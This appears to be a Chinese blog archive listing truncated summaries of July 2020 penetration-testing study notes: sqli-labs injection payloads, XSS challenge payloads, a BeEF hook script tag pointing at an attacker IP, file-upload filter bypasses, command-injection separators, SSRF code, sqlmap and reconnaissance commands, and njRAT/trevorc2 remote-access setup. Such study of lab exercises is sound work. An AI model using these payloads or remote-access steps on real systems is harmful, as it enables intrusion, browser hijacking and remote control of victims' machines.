07 2020 档案

摘要:(base64加密) Less-21: select * from table where cookie=('cookie');admin') and sleep(5)#>>YWRtaW4nKSBhbmQgc2xlZXAoNSkjsqlmap --tamper base64encode.py Les 阅读全文
posted @ 2020-07-31 14:16 f1veseven 阅读(131) 评论(0) 推荐(0)
摘要:该环境客户端在访问服务器时服务器分为两个部分 Tomacat / jsp + apache / php 在已搭建apache + php的环境下我们再搭建一个tomcat + jsp环境即可 在官网下载jspstudy安装,安装路径和phpstudy同一级 将sqli-labs中的zip文件tomc 阅读全文
posted @ 2020-07-30 20:25 f1veseven 阅读(244) 评论(0) 推荐(0)
摘要:Less-1: select * from table where id='1' limit 0,1; Less-2: select * from table where id=1 limit 0,1; Less-3: select * from table where id=('1') limit 阅读全文
posted @ 2020-07-29 19:22 f1veseven 阅读(126) 评论(0) 推荐(0)
摘要:DDL语句: CREATE:create database xxx;create table xxx(id int,uname varchar(32));DROP:drop database xxx default charset utf8;drop table xxx;ALTER:alter ta 阅读全文
posted @ 2020-07-22 21:47 f1veseven 阅读(157) 评论(0) 推荐(0)
摘要:命令执行函数system()exec()shell_exec()passthru()popen()proc_popen() windows中的命令执行 | 前面命令输出结果作为后面命令的输入内容 || 前面命令执行失败的时候才执行后面的命令 & 前面命令执行后接着执行后面的命令 && 前面命令执行成 阅读全文
posted @ 2020-07-17 17:46 f1veseven 阅读(174) 评论(0) 推荐(0)
摘要:SSRF(Server-Side Request Forgery:服务器端请求伪造) 漏洞代码及相关函数 <?php function curl($url){ $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch, 阅读全文
posted @ 2020-07-17 13:43 f1veseven 阅读(109) 评论(0) 推荐(0)
摘要:绕过方法 去除前端js认证 修改mime-type类型 添加空格绕过 php 修改文件后缀名 php2、php3、phtml 大小写混淆绕过 PhP 点号绕过 php. 特殊符号绕过 php::$DATA 路径绕过 php. . 双写绕过 pphphp %00绕过 php%00(php5.3以下版本 阅读全文
posted @ 2020-07-16 12:58 f1veseven 阅读(131) 评论(0) 推荐(0)
摘要:Stage #1 payload: <script>alert(document.domain);</script> Stage #2 payload: "><script>alert(document.domain);</script> Stage #3 burp抓包,在p2处输入payload 阅读全文
posted @ 2020-07-12 22:31 f1veseven 阅读(122) 评论(0) 推荐(0)
摘要:启动beef和apache 修改主页,在网页中添加 <script src='http://IP:3000/hook.js'></script> xss漏洞利用 篡改网页a标签中的连接 <script> window.onload = function(){ var link = document. 阅读全文
posted @ 2020-07-11 11:32 f1veseven 阅读(178) 评论(0) 推荐(0)
摘要:sqlmap -l 读取proxy中的http请求文件-x 读取http://www.xx.com/?id=1-m 读取文件中多行url-r 读取http请求文件-c 调用配置文件-g google批量扫注--data设定--method 强制使用PUT请求--param-del确定分隔符--coo 阅读全文
posted @ 2020-07-08 21:35 f1veseven 阅读(1640) 评论(0) 推荐(0)
摘要:sql注入验证: \ 'and 1=1and 1=2 sqlmap基本命令 sqlmap -r *.txt -p idsqlmap -u '192.168.1.101/cms/show.php?id=38' --dbssqlmap -u '192.168.1.101/cms/show.php?id= 阅读全文
posted @ 2020-07-06 19:58 f1veseven 阅读(189) 评论(0) 推荐(0)
摘要:与数据库交互的php代码 $query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';"; 关键的SQL语句 select * from `users` where user = '$user' and pa 阅读全文
posted @ 2020-07-04 22:53 f1veseven 阅读(184) 评论(0) 推荐(0)
摘要:目标内容 服务器系统、数据库系统、中间件系统、应用程序系统、边界设备等信息,以及系统管理员信息 信息收集分类 主动信息收集:直接与目标交互被动信息收集:通过第三方引擎与目标交互 工具shodan 语法: webcamport:22host:182.61.200.7city:new york port 阅读全文
posted @ 2020-07-03 21:19 f1veseven 阅读(314) 评论(0) 推荐(0)
摘要:CDN全称Content Delivery Network,我个人理解为是一个缓存服务器,相当于是一个主机服务器的中转站 因为cdn的存在,大部分访问的域名ip都是cdn服务器的ip,并不是真实的主机ip 想要查找到域名的真实ip可以用一些在线查找工具查找ip 阅读全文
posted @ 2020-07-03 15:30 f1veseven 阅读(160) 评论(0) 推荐(0)
摘要:import requests r = requests.get('http://www.baidu.com') r.headers 阅读全文
posted @ 2020-07-03 15:05 f1veseven 阅读(844) 评论(0) 推荐(1)
摘要:关键字 作用 例子 site 指定搜索域名 site:baidu.com inurl 指定url中关键字 inurl:.php?id= intext 指定网页中关键字 intext:百度 filetype 搜索文件类型 filetype:pdf intitle 指定网页标题关键字 intitle:b 阅读全文
posted @ 2020-07-03 14:55 f1veseven 阅读(177) 评论(0) 推荐(0)
摘要:域名扫描 命令行工具: whois dirb dirbuster whatweb wpscan wydomain Dayu 图形化工具: maltego 端口扫描 nmap nmap -A -v -T4 192.168.1.1 masscan masscan -p80 192.168.1.1/24 阅读全文
posted @ 2020-07-02 20:11 f1veseven 阅读(369) 评论(0) 推荐(0)
摘要:njRAT 打开njRAT客户端 在builder中确定ip和port 将生成的exe放入目标中执行就能生成相应的连接 trevorc2 配置trevorc2_server.py 设置trevorc2_client.py和trevorc2_client.ps1中的ip 服务端和客户端分别启动相应的p 阅读全文
posted @ 2020-07-01 17:41 f1veseven 阅读(220) 评论(0) 推荐(0)